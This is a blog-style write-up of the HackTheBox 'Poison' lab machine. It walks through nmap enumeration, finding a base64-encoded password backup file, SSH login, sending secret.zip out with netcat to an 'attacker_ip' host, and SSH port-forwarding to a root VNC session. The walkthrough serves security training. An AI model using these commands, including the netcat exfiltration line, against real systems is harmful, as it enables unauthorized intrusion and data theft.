HackTheBox – Poison Writeup

Posion machine on hackthebox retired Today  anddd  I will explain, how I solved Poison box on HacktheBox. This box was one of the earlier machines attempted ..and its fairly easier one to crack.

Lets begin our enumeration  with Nmap scan.

nmap -sC -sV 10.10.10.84 -T4

Nmap scan report for 10.10.10.84
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

From Nmap scan, we have two ports (22 and 80) open. its feasible to start our enumeration with the web server port.

On navigating to http://10.10.10.84,

we find an interesting portal which displays,

Temporary website to test local .php scripts.

Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

 

so lets navigate to listfiles.php as it seems interesting.

http://10.10.10.84/listfiles.php

we are greeted with the following content :

Array( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt)

again, pwdbackup.txt looks interesting. Lets navigate to it:

http://10.10.10.84/listfiles.php

displays :

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

As we see, encoding appears to be base64 . so after decoding the coded text 13 times.

final decoded value : Charix!2#4%6&8(0

so it appears to be credentials of some sort.  and also username appears to be charix.

Lets use these credentials to connect through SSH .

ssh charix@10.10.10.84

charix@Poison:~ % whoami
charix

Andd we are in!

grab the user flag and lets continue our enumeration!

charix@Poison:~ % ls
secret.zip user.txt

we find an interesting file named secret.zip which is password protected. for some reason i was unable to unzip it on remote machine . so i copied the file to local using netcat :

on our local  machine : nc -nlvp 1234

on victim machine : nc -w 3 -nv attacker_ip 1234 < secret.zip

unzip the file with command using the same password which was used for SSH  : unzip secret.zip

and we get a file named secret as the content of the zip file . Also, we find that there is a vnc server running as root on victim machine.

charix@Poison:~ % ps -aux | grep root

<<snipped>>

root 529 0.0 0.7 23620 7148 v0- I Mon05 0:00.14 Xvnc :1 -deskto
root 540 0.0 0.3 67220 3288 v0- I Mon05 0:00.04 xterm -geometry

<<snipped>>

charix@Poison:~ %netstat -a

<<snipped>>

tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN

<<snipped>>

as it cannot be accessible from outside , we have to use local port forwarding to connect to it.

lets create a ssh tunnel to local port forward the vnc port.

on one of our terminal,

ssh -L 2345:localhost:5901 charix@10.10.10.84

once connected minimize the terminal to leave the session open.

interpretation of this command is that,

we are instructing ssh to open and listen on port (2345) on our local machine , whichever request hits port 2345 on our machine will be forwarded to server machine(i.e poison machine) on port 5901 through SSH tunnel.

here, localhost should not be confused to our local machine, it implies localhost on server machine(i.e poison machine).

now on a new terminal, lets connect to the vncserver with the extracted secret file as password:

vncviewer 127.0.0.1::2345 -passwd secret

we get the VNC session of root user! grab the root.txt flag anndd keep pawning!

stay tuned for more write ups. Have a wonderful day ahead! 🙂